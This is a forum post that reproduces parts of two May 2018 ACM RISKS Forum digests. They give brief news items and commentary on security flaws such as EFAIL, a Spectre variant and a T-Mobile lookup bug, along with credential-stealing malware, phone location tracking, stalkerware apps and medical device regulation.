    across the expression "RTFM" on more than one occasion. Usually delivered
    with a degree of snark, if not downright hostility, the initialism stands
    for "read the ... manual," with an added expletive added for good
    measure. As is often pointed out, the advice is not only rude, it's also
    often not helpful. Sometimes there is no documentation to read and if there
    is, it's poorly written and difficult to understand.

    The latter seems to be the case with CVE-2018-8897, the latest operating
    system vulnerability.

    On May 8, Nick Peterson of Everdox Tech and Nemanja Mulasmajic of
    triplefault.io, made public a research paper that revealed all major
    operating systems -- Linux, Apple, Windows and BSD -- to be affected by a
    flaw that can allow authenticated users to read data in memory or control
    low-level OS functions. The good news is that the researchers notified
    software developers of the problem on April 30, and by the time it was made
    public, patches were at the ready.

    http://www.itprotoday.com/endpoint-...lamed-multiple-operating-system-security-flaw

    ------------------------------

    Date: Tue, 15 May 2018 17:52:40 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Problem with Chinese GPS (Now I Know)

    If you're in a foreign country and try to read a map, you may find it
    difficult -- unless your host nation's language is the same as your home
    nation's, the words are going to be different and, assuming you're not
    bilingual, will require some translation. But the locations of the roads,
    rivers, buildings, and the like should be the same, regardless of whether
    the map is in English, Spanish, or Chinese, right? Language aside, Google
    Maps should work the same everywhere, right?

    Well, no.

    http://nowiknow.com/the-problem-with-chinese-gps/

    ------------------------------

    Date: Tue, 15 May 2018 19:06:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: U.S. identifies suspect in major leak of CIA hacking tools (WashPo)

    The former agency employee is being held in a Manhattan jail on unrelated
    charges.

    http://www.washingtonpost.com/world...5ef3f8-5865-11e8-8836-a4a123c359ab_story.html

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.69
    ************************
     
  3. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.70

    RISKS List Owner

    May 26, 2018 7:09 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 26 May 2018 Volume 30 : Issue 70

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)
    Don't Put That in My Heart Until You're Sure It Really Works (NYT)
    "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)
    "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)
    Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)
    "This cryptocurrency phishing attack uses new trick to drain wallets"
    (Danny Palmer)
    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)
    ICE abandons its dream of ‘extreme vetting’ software that could
    E-Mail Clients are Insecure, PGP and S/MIME 100% secure
    E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)
    "Senator wants to know how police can locate any phone in seconds without
    a warrant" (Zach Whittaker)
    US cell carriers are selling access to your real-time phone location data
    (Zach Whittaker)
    Hundreds of Apps Can Empower Stalkers to Track Their Victims (NYTimes)
    "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into
    secret eavesdroppers" (CSO Online)
    So, Umm, Google Duplex's Chatter Is Not Quite Human (Scientific American)
    Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence (The Wrap)
    Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)
    Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)
    Most GDPR emails unnecessary and some illegal, say experts (The Guardian)
    The Pentagon Has a Big Plan to Solve Identity Verification in Two Years
    (Defense One)
    Unplug Your Echo! (Ars Technica)
    FBI dramatically overstates how many phones they can't get into (WaPo)
    "Google to remove "secure" indicator from HTTPS pages on Chrome" (ZDNet)
    Google's Selfish Ledger is an unsettling vision of Silicon Valley social
    engineering (The Verge)
    "A flaw in a connected alarm system exposed vehicles to remote hacking"
    (ZDNet)
    Syrian hackers who tricked reporters indicted (WashPo)
    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    (ZDNet)
    Is technology bringing history to life or distorting it? (WashPo)
    Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)
    Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)
    The surprising return of the repo man (WashPo)
    Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)
    Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to Win
    Election (NY Times)
    Re: Securing Elections (Mark E. Smith)
    Re: Dark code (Kelly Bert Manning, Richard O'Keefe)
    Fitness App Leads To Arrest For Attack On McLean Cyclist (McLean VA Patch)
    Man Is Charged With Hacking West Point and Government Websites (NYT)
    Fake Facebook accounts and online lies multiply in hours after Santa Fe
    school shooting (WashPo)
    Re: "Warning: Dangerous Fake Emails About Google Privacy Changes" (Wol)
    Re: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (Yooly)
    Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    Re: Chinese GPS (Dimitri Maziuk)
    Re: The risk from robot weapons (Amos Shapir)
    Will You Be My Emergency Contact Takes On a Whole New Meaning (NYT)
    This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)
    As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 22 May 2018 09:31:51 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)

    Boy, 9, dies in accident involving motorized room partition at his Fairfax school

    ------------------------------

    Date: Mon, 21 May 2018 19:30:25 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Don't Put That in My Heart Until You're Sure It Really Works
    (NYTimes)

    Opinion | Don’t Put That in My Heart Until You’re Sure It Really Works

    'The bar for approval of medical devices is too low. There is no reason we
    shouldn’t require, as we almost always do for drugs, a randomized
    placebo-controlled trial showing improvements in “hard” outcomes like
    mortality before approving them.

    'Unfortunately, the United States may soon make it even easier for medical
    devices to reach the patient’s bedside. The Food and Drug Administration is
    considering requiring less upfront research and instead adding increased
    oversight after a device has been introduced into the market. The argument
    is that this will spur technological innovation and perhaps help terminally
    ill patients. However, loosening regulations could extract a steep cost from
    patients and the health system.'

    Greater release frequency with less rigorous pre-production qualification
    criteria and test coverage is NOT a recipe for safe and viable embedded
    software stacks that drive these gizmos. Suppressing production defect
    escape potential is challenging. Proactive techniques that facilitate early
    and rapid software defect discovery capability -- such as continuous
    integration and high-speed regression -- are effective when capable test
    authors challenge software stack authors. Alas, industry (not just embedded
    medical implants, cars, cellphones, etc.) often economize on qualification
    product life cycle stages. There are "too many bits" to test quickly and
    thoroughly. Governance decisions and gut judgment is sometimes applied with
    impunity.

    It appears that the FDA has gone rogue, and off-the-rails via regulatory
    capture. A business-friendly administration promoting "caveat emptor" as
    standard operating procedure also intensifies medical device implantation
    risks. Refer to "The Danger Within Us: America's Untested, Unregulated
    Medical Device Industry and One Man's Battle to Survive It" by Jeanne Lenzer
    for an expose' of the implantable medical device industry.

    If you are confronted with a "hard sell" to "go" for implantation, ask
    a few questions of your physician and the device salesperson:

    Are there any randomized control trials and non-industry funded studies that
    evaluate the candidate device's effectiveness in humans? Were the studies
    performed by a non-profit? Or a university? Does the entity reporting the
    study's results receive funding from the device manufacturer? Do any of the
    study's authors disclose industry ties? If so, a report that is published
    might possess skewed findings. Is the raw data from these studies available
    for inspection? If so, try to find a consultant to review it for you and
    render an opinion. Will the device manufacturer share their software and
    system test plans for inspection? If so, try to locate a person "skilled in
    the art of embedded software test" to evaluate the test plan, and the
    firmware test results released with the implanted device. Try to gain access
    to the manufacturer's defect tracking system to explore defect density and
    discovery rates and repair history.

    Does the device have a special mechanism to disable it, should it misbehave?
    If so, try to learn about how this is accomplished and ensure there are
    backup sources -- other physicians or facilities that possess this
    mechanism.

    How many implants have been performed in the past year? How many
    patient deaths occurred post-implantation? Never mind if the deaths
    were attributed to the device or not, find the raw count of deaths.

    For each post-implant death, was an FDA MAUDE report filed? How many of
    these reports where filed by medical practitioners? How many by the device
    manufacturer? Confront the salesperson to learn why, or if, there's a huge
    discrepancy between the number of deaths and the number of FDA MAUDE reports
    they or practitioners reported. That discrepancy is apparently a clue that
    the manufacturer is or has concealed important evidence about device
    capability or side-effects that can injure or kill you.

    Has the device been the subject of prior recalls? If so, why? Has the
    manufacturer been sued for product liability previously? Are they currently
    under litigation for liability? These questions can provide insight into
    their organization's maturity and ability to pro-actively act on
    lessons-learned.

    Is the device implantation under consideration being applied for "an
    off-label" application in your case? If so, why?

    ------------------------------

    Date: Fri, 18 May 2018 09:24:59 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)

    Liam Tung | 18 May 2018
    Ex-Intel security expert: This new Spectre attack can even reveal firmware secrets | ZDNet

    Ex-Intel security expert: This new Spectre attack can even reveal firmware
    secrets; A new variant of Spectre can expose the contents of memory that
    normally can't be accessed by the OS kernel.

    opening text:

    Yuriy Bulygin, the former head of Intel's advanced threat team, has
    published research showing that the Spectre CPU flaws can be used to break
    into the highly privileged CPU mode on Intel x86 systems known as System
    Management Mode (SMM).

    ------------------------------

    Date: Wed, 16 May 2018 09:11:51 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)

    This malware is harvesting saved credentials in Chrome, Firefox browsers | ZDNet

    This malware is harvesting saved credentials in Chrome, Firefox browsers
    Researchers say the new Vega Stealer malware is currently being used
    in a simple campaign but has the potential to go much further.
    By Charlie Osborne for Zero Day | May 14, 2018 -- 07:42 GMT (00:42
    PDT) | Topic: Security

    selected text:

    Vega Stealer is also written in .NET and focuses on the theft of
    saved credentials and payment information in Google Chrome. These
    credentials include passwords, saved credit cards, profiles, and cookies.

    When the Firefox browser is in use, the malware harvests specific
    files -- "key3.db" "key4.db", "logins.json", and "cookies.sqlite" --
    which store various passwords and keys.

    However, Vega Stealer does not wrap up there. The malware also takes
    a screenshot of the infected machine and scans for any files on the
    system ending in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf for
    exfiltration.

    According to the security researchers, the malware is currently being
    utilized to target businesses in marketing, advertising, public
    relations, retail, and manufacturing.

    ------------------------------

    Date: Wed, 23 May 2018 18:07:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)

    Charlie Osborne for Zero Day | 22 May 2018
    Student awarded $36,000 for remote execution flaw in Google App Engine | ZDNet
    The discovery was made by a university student who was not aware of
    how dangerous the vulnerability was.

    opening text:

    Google has awarded a young cybersecurity researcher $36,337 for disclosing a
    severe vulnerability in the Google App Engine.

    The 18-year-old student from Uruguay's University of the Republic discovered
    a critical remote code execution (RCE) bug in the system, which is a
    framework and cloud platform used for the hosting and development of web
    applications in Google data centers.

    ------------------------------

    Date: Fri, 18 May 2018 09:05:54 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This cryptocurrency phishing attack uses new trick to drain
    wallets" (Danny Palmer)

    Danny Palmer | 17 May 2018
    This cryptocurrency phishing attack uses new trick to drain wallets | ZDNet

    This cryptocurrency phishing attack uses new trick to drain wallets
    Campaign uses automation to empty cryptocurrency wallets and produce
    lucrative returns.

    ... the phishing campaign mimics the front end of the MyEtherWallet website
    for the purpose of stealing credentials, while also deploying what the
    authors call an "automated transfer system" to process the details captured
    by the fake page and transfer funds.

    The attack injects scripts into active web sessions and silently and
    invisibly executes bank transfers just seconds after the user logs
    into their cryptocurrency account.

    Researchers note that MyEtherWallet is an appealing target for attackers
    because it is simple to use, but its lack of security compared to other
    banks and exchanges make it a prominent target for attack.

    After that, the crooks look to drain accounts when the victim decrypts their
    wallet. The scam uses scripts which automatically create the fund transfer
    by pressing the buttons like a legitimate user would, all while the activity
    remains hidden -- it's the first time an attack has been seen to use this
    automated tactic.

    ------------------------------

    Date: Wed, 16 May 2018 16:47:10 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)

    Baldet, who most recently served as the bank’s blockchain program lead, is
    cofounding a new startup, Clovyr, that aims to help consumers, developers,
    and businesses explore the nascent, albeit burgeoning, world of
    blockchain-based, decentralized technologies, she tells Fortune. She is
    joined by Nielsen, former lead developer of Quorum, a JPMorgan Chase-built
    blockchain for business, who will serve as the concern’s chief technologist.

    Baldet unveiled a Clovyr demo at the Consensus conference in Manhattan on
    Monday afternoon. The company is in the process of fundraising.

    Clovyr's product, now under development, is slated to take the form of
    something akin to an app store, where people and businesses can experiment
    with a multitude of decentralized apps and services, developer toolsets, and
    underlying distributed ledgers. The cofounders envision the platform serving
    as a neutral ground, offering a browser-like dashboard for the
    blockchain-curious, through which Clovyr can provide support and other
    services to customers according to their needs.

    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup

    Just what consumers need. What could go wrong? Also, what's with "Clovyr"
    name?

    ------------------------------

    Date: Thu, 17 May 2018 16:48:50 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: ICE abandons its dream of ‘extreme vetting’ software that could
    predict whether a foreign visitor would become a terrorist (WashPo)

    Immigration officials originally wanted artificial intelligence that could
    continuously track foreign visitors' social media. They're giving the job to
    humans instead.

    ICE just abandoned its dream of ‘extreme vetting’ software that could predict whether a foreign visitor would become a terrorist

    ------------------------------

    Date: Thu, 17 May 2018 15:10:11 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: E-Mail Clients are Insecure, PGP and S/MIME 100% secure

    There is no "security" problem with either PGP or S/MIME encrypted and
    signed messages. The problem is, as it has been since the introduction of
    the ability to embed executable code into e-mail messages (aka, Web Pages
    and Rich Text via SMTP), the shoddy and useless security state of almost all
    e-mail clients.

    If you turn off the [expletive deleted] (HTML code execution, etc) then
    there is no problem. In other words, the only problem that exists is that
    which you created yourself. So if you do something utterly stupid, you
    deserve whatever you get in return.

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    Stop Using Common Email Encryption Tools Immediately, Researchers Warn

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    http://www.eff.org/deeplinks/2018/05/not-so-pretty-what-you-need-know-about-e-fail-and-pgp-flaw-0

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community of the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now. Because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/

    ------------------------------

    Date: Thu, 24 May 2018 18:24:24 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 24 May 2018

    http://www.zdnet.com/article/tmobile-bug-let-anyone-see-any-customers-account-details/

    T-Mobile bug let anyone see any customer's account details Exclusive: The
    exposed lookup tool let anyone run a customer's phone number -- and obtain
    their home address and account PIN, used to contact phone support.

    selected text:

    A bug in T-Mobile's website let anyone access the personal account details
    of any customer with just their cell phone number.

    The flaw, since fixed, could have been exploited by anyone who knew where to
    look -- a little-known T-Mobile subdomain that staff use as a customer care
    portal to access the company's internal tools.

    Although the API is understood to be used by T-Mobile staff to look up
    account details, it wasn't protected with a password and could be easily
    used by anyone.

    The returned data included a customer's full name, postal address, billing
    account number, and in some cases information about tax identification
    numbers. The data also included customers' account information, such as if
    a bill is past-due or if the customer had their service suspended.

    The data also included references to account PINs used by customers as a
    security question when contacting phone support. Anyone could use that
    information to hijack accounts.

    [Gene also contributed a previous item from Zack Whittaker om 17 May
    on the same subject:
    http://www.zdnet.com/article/cell-p...ed-millions-of-americans-real-time-locations/
    I think the more recent one suffices here. PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:27:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Senator wants to know how police can locate any phone in
    seconds without a warrant" (Zach Whittaker)

    Zack Whittaker for Zero Day | May 11, 2018
    http://www.zdnet.com/article/securus-police-cell-phones-warrantless-tracking/

    Senator wants to know how police can locate any phone in seconds without a
    warrant. Real-time location data was accessible by police under "the legal
    equivalent of a pinky promise," said a senator who is demanding that the FCC
    investigate why a company, contracted to monitor calls of prison inmates,
    also allows police to track phones of anyone in the US without a warrant.

    The bombshell story in *The New York Times& revealed Securus, a Texas-based
    prison technology company, could track any phone "within seconds" by
    obtaining data from cellular giants -- including AT&T, Sprint, T-Mobile, and
    Verizon -- typically reserved for marketers.

    ------------------------------

    Date: Fri, 18 May 2018 09:29:13 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "US cell carriers are selling access to your real-time phone
    location data" (Zach Whittaker)

    Zack Whittaker, Zero Day, 14 May 2018
    http://www.zdnet.com/article/us-cell-carriers-selling-access-to-real-time-location-data/

    US cell carriers are selling access to your real-time phone location data
    The company embroiled in a privacy row has "direct connections" to all major
    US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint -- and
    Canadian cell networks, too.

    Four of the largest cell giants in the US are selling your real-time
    location data to a company that you've probably never heard about before.

    In case you missed it, a senator last week sent a letter demanding the
    Federal Communications Commission (FCC) investigate why Securus, a prison
    technology company, can track any phone "within seconds" by using data
    obtained from the country's largest cell giants, including AT&T, Verizon,
    T-Mobile, and Sprint, through an intermediary, LocationSmart.

    ------------------------------

    Date: Sat, 19 May 2018 07:36:23 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Hundreds of Apps Can Empower Stalkers to Track Their Victims
    (The New York Times)

    http://mobile.nytimes.com/2018/05/19/technology/phone-apps-stalking.html

    'KidGuard is a phone app that markets itself as a tool for keeping tabs on
    children. But it has also promoted its surveillance for other purposes and
    run blog posts with headlines like *How to Read Deleted Texts on Your
    Lover's Phone.*

    'A similar app, mSpy, offered advice to a woman on secretly monitoring her
    husband. Still another, Spyzie, ran ads on Google alongside results for
    search terms like *catch cheating girlfriend iPhone*.

    'As digital tools that gather cellphone data for tracking children,
    friends or lost phones have multiplied in recent years, so have the
    options for people who abuse the technology to track others without
    consent.'

    Surveillance capitalism is booming. These apps are e^(to the creepy).

    ------------------------------

    Date: Fri, 18 May 2018 15:06:20 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home
    into secret eavesdroppers" (CSO Online)

    http://www.csoonline.com/article/32...xa-google-home-into-secret-eavesdroppers.html

    Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into secret
    eavesdroppers. Researchers devise new two new attacks -- voice squatting
    and voice masquerading -- on Amazon Alexa and Google Home, allowing
    adversaries to steal personal information or silently eavesdrop.

    Ms. Smith, CSO | 17 May 2018

    Ms. Smith (not her real name) is a freelance writer and programmer with a
    special and somewhat personal interest in IT privacy and security issues.

    opening text:

    Oh, goody, Amazon Alexa and/or Google Home could be hit with remote,
    large-scale "voice squatting" and "voice masquerading" attacks to steal
    sensitive user information or eavesdrop on conversations.

    ------------------------------

    Date: Fri, 18 May 2018 17:56:12 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: So, Umm, Google Duplex's Chatter Is Not Quite Human
    (Scientific American)

    http://www.scientificamerican.com/article/so-umm-google-duplexs-chatter-is-not-quite-human/

    "Google’s Duplex voice assistant drew applause last week at the company’s
    annual I/O developer conference after CEO Sundar Pichai demonstrated the
    artificially intelligent technology autonomously booking a hair salon
    appointment and a restaurant reservation, apparently fooling the people
    who took the calls. But enthusiasm has since been tempered with unease
    over the ethics of a computer making phone calls under the guise of being
    human. Such a mixed reception has become increasingly common for Google,
    Amazon, Facebook and other tech companies as they push AI's boundaries in
    ways that do not always seem to consider consumer privacy or safety
    concerns."

    ------------------------------

    Date: Fri, 18 May 2018 08:27:18 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence
    (The Wrap)

    via NNSquad
    http://www.thewrap.com/henry-kissinger-is-scared-of-unstable-artificial-intelligence/

    The former U.S. secretary of state is warning against the threat of
    "unstable" artificial intelligence in a new essay in The Atlantic --
    fearing the rapid rise of machines could lead to questions humanity is not
    ready to tackle.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:25 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Fri, 18 May 2018 17:53:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)

    http://www.scientificamerican.com/article/gunshot-sensors-pinpoint-destructive-fish-bombs/

    "Rogue fishers around the world toss explosives into the sea and scoop up
    bucketloads of stunned or dead fish, an illegal practice in many nations
    that can destroy coral reefs and wreak havoc on marine biodiversity.
    Catching perpetrators amid the vastness of the ocean has long proved
    almost impossible, but researchers working in Malaysia have now adapted
    acoustic sensors—originally used to locate urban gunfire—to pinpoint these
    marine blasts within tens of meters."

    Example of dual-use technology for public and environmental safety
    maintenance.

    ------------------------------

    Date: Mon, 21 May 2018 12:04:35 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Most GDPR emails unnecessary and some illegal, say experts
    (The Guardian)

    NNSquad
    http://www.theguardian.com/technolo...cessary-and-in-some-cases-illegal-say-experts

    The vast majority of emails flooding inboxes across Europe from companies
    asking for consent to keep recipients on their mailing list are
    unnecessary and some may be illegal, privacy experts have said, as new
    rules over data privacy come into force at the end of this week.

    AND EVEN WORSE: "Warning: New European Privacy Law Has Become a
    Jackpot for Internet Crooks" -

    http://lauren.vortex.com/2018/05/01...-law-has-become-a-jackpot-for-internet-crooks

    ------------------------------

    Date: Wed, 23 May 2018 13:58:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Pentagon Has a Big Plan to Solve Identity Verification in
    Two Years (Defense One)

    The plan grew out of efforts to modernize the Defense Department's ID cards.

    The Defense Department is funding a project that officials say could
    revolutionize the way companies, federal agencies and the military itself
    verify that people are who they say they are and it could be available in
    most commercial smartphones within two years.

    The technology, which will be embedded in smartphones’ hardware, will
    analyze a variety of identifiers that are unique to an individual, such as
    the hand pressure and wrist tension when the person holds a smartphone and
    the person’s peculiar gait while walking, said Steve Wallace, technical
    director at the Defense Information Systems Agency.

    Organizations that use the tool can combine those identifiers to give the
    phone holder a “risk score,” Wallace said. If the risk score is low enough,
    the organization can presume the person is who she says she is and grant her
    access to sensitive files on the phone or on a connected computer or grant
    her access to a secure facility. If the score’s too high, she’ll be locked
    out.

    http://www.defenseone.com/technolog...solve-identity-verification-two-years/148280/

    ------------------------------

    Date: Thu, 24 May 2018 17:41:32 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Unplug Your Echo! (Ars Technica)

    [Thanks to Phil Porras]
    http://arstechnica.com/gadgets/2018...o-device-secretly-shared-users-private-audio/

    Amazon confirmed an Echo owner's privacy-sensitive allegation on Thursday,
    after Seattle CBS affiliate KIRO-7 reported that an Echo device in Oregon
    sent private audio to someone on a user's contact list without permission.
